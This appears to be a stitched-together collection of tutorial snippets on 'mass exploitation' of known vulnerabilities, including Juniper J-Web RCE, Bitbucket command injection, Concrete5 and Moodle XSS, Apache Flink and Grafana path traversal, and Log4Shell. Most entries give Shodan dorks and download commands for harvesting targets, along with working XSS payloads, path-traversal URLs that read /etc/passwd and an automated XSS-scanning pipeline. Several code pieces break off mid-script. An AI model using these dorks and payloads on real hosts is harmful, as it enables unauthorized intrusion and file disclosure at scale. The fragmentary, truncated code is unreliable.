Hi Guys..
In this video, we will see mass exploitation of Juniper Web Device Manager - RCE vulnerability (CVE-2023-36845).
Description: A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to control certain environment variables to execute remote commands.
Shodan Dork : title:"Juniper" http.favicon.hash:2141724739
Download the results using the command below (a Shodan Premium API key is needed)

Hi Guys..
Today we explore the Atlassian Bitbucket Command Injection Vulnerability (CVE-2022-36804)
Description: Multiple API endpoints in Atlassian Bitbucket Server and Data Center 7.0.0 before version 7.6.17, from version 7.7.0 before version 7.17.10, from version 7.18.0 before version 7.21.4, from version 8.0.0 before version 8.0.3, from version 8.1.0 before version 8.1.3, from version 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1 allow remote attackers with read permissions to a public or private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request.
Shodan Dork : 'http.component:"BitBucket"'
Run the commands below to download the results (a Shodan Premium API key is needed)
shodan download bitbucket 'http.component:"BitBucket"'   # This will download 1000 results

# cat targets_urls.txt
http://testphp.vulnweb.com
## Command Line
gospider -S targets_urls.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe -o result.txt
# Tools used
# https://github.com/jaeles-project/gospider
# https://github.com/tomnomnom/qsreplace

# Requires Python 3
# Install mmh3 by running: pip install mmh3
import mmh3
import requests
import codecs
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
response = requests.get('https://licious.in/favicon.ico', verify=False)

#!/bin/bash
filename=$1
resolversFile=$2
resultDir=~/recon/output
nucleiTmpDir=~/nuclei-templates
Header='User-Agent: Mozllla/5.0 (Macintosh; Intel Mac OS X 10_13_0) AppleWebKlt/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safarl/537.36'
nuclei -ut
for line in $(cat $1); do

Concrete5 CMS XSS vulnerability tweet by Jackson
Shodan Dork : 'Set-Cookie: CONCRETE5'
Vulnerable URL :
https://IP:PORT/ccm/system/panels/page/preview_as_user/preview?cID="></iframe><img/src/onerror=.1|alert(document.domain)>
Use the command below to download the results (a Shodan Premium API key is needed)
shodan download concrete5 'Set-Cookie: CONCRETE5'

Moodle XSS vulnerability
Shodan Dork : 'http.component:Moodle'
Vulnerable URL :
https://IP/mod/lti/auth.php?redirect_uri=javascript:alert(document.domain)
Use the command below to download the results (a Shodan Premium API key is needed)
shodan download moodle 'http.component:Moodle'

Mass exploitation of Apache Flink RESTful API Arbitrary File Read vulnerability [CVE-2020-17519]
Description: A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process.
Shodan Dork : 'Apache Flink'
Affected Version : 1.11.1 and 1.11.2
Vulnerable URL :
https://host:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

Mass exploitation of Grafana 8.x Path Traversal (Pre-Auth) vulnerability (CVE-2021-43798).
Description: Grafana is an open-source platform for monitoring and observability. Grafana versions 8.0.0-beta1 through 8.3.0 (except for patched versions) are vulnerable to directory traversal, allowing access to local files.
Users are advised to upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1.
Vulnerable URL :
http://IP:PORT/public/plugins/alertlist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
Shodan Dork : http.title:"grafana"

Description: Apache Log4j2 versions up to and including 2.14.1 (excluding security release 2.12.2) are vulnerable to a remote code execution vulnerability. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
Prerequisite
Docker must be installed. See the link below for how to install Docker on Kali Linux
https://youtu.be/xN2JGqiqgow
Steps
A) Download the Log4j vulnerable app from the GitHub link below
https://github.com/simrotion13/log4shell-vulnerable-app